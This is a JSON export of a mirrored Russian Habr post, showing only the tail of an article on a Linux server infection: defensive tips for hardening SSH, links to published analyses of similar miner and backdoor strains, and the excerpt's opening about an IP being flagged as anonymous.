\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432 Azure \u0432 \u043c\u0430\u0435 2019<\/a><\/p>\n<p>  <\/p>\n<h2 id=\"kak-zaschititsya-ot-podobnyh-atak\">\u041a\u0430\u043a \u0437\u0430\u0449\u0438\u0442\u0438\u0442\u044c\u0441\u044f \u043e\u0442 \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u0430\u0442\u0430\u043a?<\/h2>\n<p>  <\/p>\n<ul>\n<li>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0435 \u043f\u0430\u0440\u043e\u043b\u0438 \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439<\/li>\n<li><a href=\"https:\/\/www.ostechnix.com\/how-to-set-password-policies-in-linux\/\">\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0435 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0443 \u043f\u0430\u0440\u043e\u043b\u0435\u0439<\/a> \u0434\u043b\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b<\/li>\n<li>\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0435 <code>fail2ban<\/code> \u0438 rate limit \u043d\u0430 ssh \u0447\u0435\u0440\u0435\u0437 <code>ufw<\/code> \u0438\u043b\u0438 \u043b\u044e\u0431\u043e\u0439 \u0434\u0440\u0443\u0433\u043e\u0439 \u0444\u0430\u0439\u0440\u0432\u043e\u043b\u043b<\/li>\n<li>\u041e\u0433\u0440\u0430\u043d\u0438\u0447\u0442\u0435 \u0434\u043e\u0441\u0442\u0443\u043f \u043a ssh \u043f\u043e\u0440\u0442\u0443 \u0441\u043f\u0438\u0441\u043a\u043e\u043c \u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0445 IP \u0430\u0434\u0440\u0435\u0441\u043e\u0432<\/li>\n<li>\u041e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043b\u043e\u0433\u0438\u043d\u0430 \u0432 shell \u0432\u0441\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0442\u0443\u0434\u0430 \u0445\u043e\u0434\u0438\u0442\u044c \u043d\u0435 \u0434\u043e\u043b\u0436\u043d\u044b<\/li>\n<\/ul>\n<p>  <\/p>\n<h2 id=\"analitika-i-sluchai-zarazheniya-pohozhimi-shtammami\">\u0410\u043d\u0430\u043b\u0438\u0442\u0438\u043a\u0430 \u0438 \u0441\u043b\u0443\u0447\u0430\u0438 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u043f\u043e\u0445\u043e\u0436\u0438\u043c\u0438 \u0448\u0442\u0430\u043c\u043c\u0430\u043c\u0438<\/h2>\n<p>  <\/p>\n<ul>\n<li><a href=\"https:\/\/www.microsoft.com\/security\/blog\/2019\/05\/23\/uncovering-linux-based-cyberattack-using-azure-security-center\/\">\u041c\u0430\u0441\u0441\u043e\u0432\u043e\u0435 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432 Azure \u0432 \u043c\u0430\u0435 2019<\/a><\/li>\n<li><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor\/\">\u0414\u0435\u0442\u0430\u043b\u044c\u043d\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u043d\u0430 TrendMicro<\/a><\/li>\n<li><a href=\"https:\/\/askubuntu.com\/questions\/1115770\/crond64-tsm-virus-in-ubuntu\/1198932\">\u0417\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0435 \u0447\u0435\u0440\u0435\u0437 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f Kodi<\/a><\/li>\n<li><a href=\"https:\/\/www.joesandbox.com\/analysis\/194469\/0\/html\">\u0410\u043d\u0430\u043b\u0438\u0437 \u043d\u0430 Joesandbox<\/a><\/li>\n<li><a href=\"https:\/\/www.virustotal.com\/gui\/file\/d4f677f570047fc1bb57cc0dfca19155c3504c72c3ff34b9ab7986c9c216fb90\/detection\">\u0410\u043d\u0430\u043b\u0438\u0437 \u043d\u0430 VirusTotal<\/a><\/li>\n<li><a href=\"https:\/\/www.infosecurity-magazine.com\/news\/graboid-terrorizing-docker-hosts\/\">\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043f\u043e\u0445\u043e\u0436\u0435\u0433\u043e \u0447\u0435\u0440\u0432\u044f \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c Graboid<\/a><\/li>\n<\/ul>\n<\/div>\n<p>               <script class=\"js-mediator-script\">!function(e){function t(t,n){if(!(n in e)){for(var r,a=e.document,i=a.scripts,o=i.length;o--;)if(-1!==i[o].src.indexOf(t)){r=i[o];break}if(!r){r=a.createElement(\"script\"),r.type=\"text\/javascript\",r.async=!0,r.defer=!0,r.src=t,r.charset=\"UTF-8\";var d=function(){var e=a.getElementsByTagName(\"script\")[0];e.parentNode.insertBefore(r,e)};\"[object Opera]\"==e.opera?a.addEventListener?a.addEventListener(\"DOMContentLoaded\",d,!1):e.attachEvent(\"onload\",d):d() } } }t(\"\/\/mediator.mail.ru\/script\/2820404\/\",\"_mediator\")}(window);<\/script>      <br \/> \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habr.com\/ru\/post\/482784\/\"> https:\/\/habr.com\/ru\/post\/482784\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"\n<div class=\"post__text post__text-html js-mediator-article\" id=\"post-content-body\" data-io-article-url=\"https:\/\/habr.com\/ru\/post\/482784\/\">\n<p>\u0421\u0435\u0433\u043e\u0434\u043d\u044f \u043c\u043e\u0439 \u0432\u043d\u0435\u0448\u043d\u0438\u0439 IP \u0431\u044b\u043b \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043d \u0432 \u0441\u0435\u0440\u0432\u0438\u0441\u0435 IVI \u0441 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435\u043c<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">\u0412\u0430\u0448 ip-\u0430\u0434\u0440\u0435\u0441 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u0430\u043d\u043e\u043d\u0438\u043c\u043d\u044b\u0439.  \u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u0435\u0441\u044c \u043a \u0441\u0432\u043e\u0435\u043c\u0443 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0443. IP \u0430\u0434\u0440\u0435\u0441 &lt;IP&gt;. \u0414\u0430\u043d\u043d\u044b\u0435 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u044b maxmind.com<\/code><\/pre>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-296720","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/296720","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=296720"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/296720\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=296720"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=296720"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=296720"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}